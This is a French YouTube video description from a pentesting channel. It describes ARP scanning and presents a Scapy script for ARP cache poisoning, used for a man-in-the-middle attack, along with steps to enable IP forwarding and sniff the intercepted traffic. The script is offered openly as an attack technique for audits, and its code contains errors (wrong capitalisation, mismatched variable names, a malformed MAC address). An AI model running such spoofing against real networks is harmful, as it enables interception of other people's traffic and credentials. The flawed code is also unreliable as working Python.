SALTINBANK - PYTHON FOR PENTESTER : SCAPY PYTHON pour faire un pondeuse ARP pour scanner le REZO !

Subscribers:
3,040
Published on ● Video Link: https://www.youtube.com/watch?v=7iWprchw9fE



Duration: 13:29
67 views
0


Tout simple je veux à partir de mon réseau (classe C) pouvoir pinguer les 256 machines sur le CIDR (/24) au niveau du réseau ...
Je pourrais jouer sur les interfaces (WLAN, ETH ou TUN) et la variable IP_RANGE (pour attaquer d'autres réseaux CLASSES A/B/C) ...
=============================================================================
Ou en offensif : Nous aurons besoin d’effectuer un MITM (Man in the Middle, homme du milieu) pour tester le réseau dans un audit. Il existe bien sûr des logiciels spécialisés, mais nous avons la possibilité de le faire avec Scapy. Cette technique du MITM passe par de l’ARP cache poisoning.
=========================================================================
Lors d’une attaque de type ARP poisoning, le pirate va se glisser entre les données envoyées par l’utilisateur et le routeur.
---------------------------------------------------------------------------------------------------------------------------------------------------
From scapy.all import *
import time
op=1 # OP code 1 pour requête ARP
Victim="10.X.X.X" # Remplacer par IP victime
Spoof="10.X.X.X" # Remplacer par IP passerelle (gateway)
mac="FF:FF:FF:FF:FF:FF:FF" # Remplacer par MAC de l'attaquant

Arp=ARP(op=op, psrc=spoof, pdst=vctim, hwdst=mac)

While 1 :
send(arp)
time.sleep(2)
------------------------------------------------------------------------------------------------------------------------------------------------
Il nous faut utiliser le protocole ARP, d’où l’utilisation de la fonction ARP() aves les paramètres suivants :

requête ARP(1)
src: adresse MAC de source.
dst : adresse MAC de destination .
hwsrc : adresse MAC que vous voulez mettre dans la table ARP distante (attaquant).
pdst : adresse IP de la machine distante dont vous voulez infecter la table ARP (victime).
psrc : adresse IP de la passerelle.
========================================================================
Il nous faut maintenant mettre notre machine en mode forward IP (/proc/sys/net/ipv4/ip_forward) et lancer le script ci-dessus ainsi qu’un sniffer (en Scapy ou directement Wireshark) pour capturer les paquets.
=======================================================================
PYTHON : rien ne l'arrête ...
=========================================================================
Thanks for watching!
Благодарю за просмотр!
Kiitos katsomisesta
Danke fürs Zuschauen!
感谢您观看
Merci d'avoir regardé
Obrigado por assistir
دیکھنے کے لیے شکریہ
देखने के लिए धन्यवाद
Grazie per la visione
Gracias por ver
شكرا للمشاهدة
=========================================================================




Other Videos By ♤ ʂąƖɬıოცąŋƙ ♤


2021-12-12SALTINBANK - LES SCRIPTS NSE [RESEAUX] Comprendre la détection par les HIDS/IPS ..
2021-12-12SALTINBANK ADVENT OF CYBER'21 THM [Day 12] Networking Sharing Without Caring-SHOWMOUNT-MOUNT-UMOUNT
2021-12-11SALTINBANK - RCE "EVASION" & "OBFFUSCATION" Antivirus + UP+2+DATE WINDOWS SERVER MSSQL 2019 !
2021-12-11SALTINBANK ADVENT OF CYBER'21 THM [Day 11] Networking Where Are The Reindeers? MSSQL EXFIL
2021-12-11SALTINBANK ADVENT OF CYBER'21 THM [Day 10] Networking Offensive Is The Best Defence !
2021-12-11SALTINBANK - PENTEST FRAMEWORK [PARTIE FINALE] PRE-ENGAGEMENT : TO DO LIST ...
2021-12-10SALTINBANK - PENTEST FRAMEWORK [PARTIE III] PRE-ENGAGEMENT : Les attaques, les questions ...
2021-12-10SALTINBANK - PENTEST FRAMEWORK [PARTIE II] PRE-ENGAGEMENT : Red Teaming & la gestion du temps ...
2021-12-10SALTINBANK - PENTEST FRAMEWORK [PARTIE I] PRE-ENGAGEMENT : Red Teaming & la gestion du temps ...
2021-12-10SALTINBANK - WHITE SHADOWS [RTX 1440P60] Oiseau de mauvaise augure [CHAP.1]
2021-12-09SALTINBANK - PYTHON FOR PENTESTER : SCAPY PYTHON pour faire un pondeuse ARP pour scanner le REZO !
2021-12-09SALTINBANK - PYTHON FOR PENTESTER : Coder un simple énumérateur de fichiers HTML à partir d'un dico.
2021-12-09SALTINBANK ADVENT OF CYBER'21 THM DAY 9 // WHERE ALL DIZ DATA GOING : Wireshark on continue !
2021-12-09SALTINBANK - WINDOWS POUR LES NULS : Technique ANTI-FORENSIQUE - Effacez ces merdes de SHELLBAGS ...
2021-12-09SALTINBANK - NVIDIA RTX DLSS // GTX IMAGE SCALING [2022] Régler les résolutions ...
2021-12-09SALTINBANK ADVENT OF CYBER'21 THM DAY 8-2 //BAG OF TOYZ // ANALYSE SHELLBAGS, NTUSER & USRCLASS.DAT!
2021-12-08SALTINBANK ADVENT OF CYBER'21 THM DAY 8 // BAG OF TOYZ // TTP, SOC, RUCHES (HIVE) & REGISTRE WINDOWS
2021-12-08SALTINBANK - SIGINT: ANALYSE DE 3 FICHIERS PCAP // La puissance de "WIRESHARK" // PART.2
2021-12-08SALTINBANK - SIGINT: TCP/IP, UDP/IP, SMB, HTTP, FORENSIQUE PAQUETS RESEAUX WIRESHARK PART.1
2021-12-07SALTINBANK - Anger Foot Windows [2772 x 1557 GLIDE 3DFX] Do Not Execute Warning [PARTII]
2021-12-07SALTINBANK - ADVENT OF CYBER 2021 [Day 7] MONGO(L)DB NOSQL // Migration Without Security ...



Tags:
CTF active directory basic
saltin
saltinbank le saltimbanque
hacker
hacking
cours d'informatique
intrusion
local linux enumeration
hacking chaine FR
chaine hacking
Saltinbank Cours CTF
CTF FRANCE
CTF français hack
saltinbank cybersec
incident response
malware threat intel
OSINT
PHP apache log poisoning
LFI
bypass filter
XSS
digital forensic analysis
analyse forensique
SQL
internet
Darpanet
arpanet
reseau
osint
Python3 simple exercice